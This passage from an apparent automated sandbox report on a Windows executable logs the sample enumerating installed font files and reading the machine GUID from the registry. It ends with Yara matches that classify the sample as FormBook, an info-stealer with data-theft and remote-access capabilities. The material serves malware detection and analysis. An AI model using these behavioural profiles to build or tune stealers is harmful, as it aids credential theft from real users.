          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
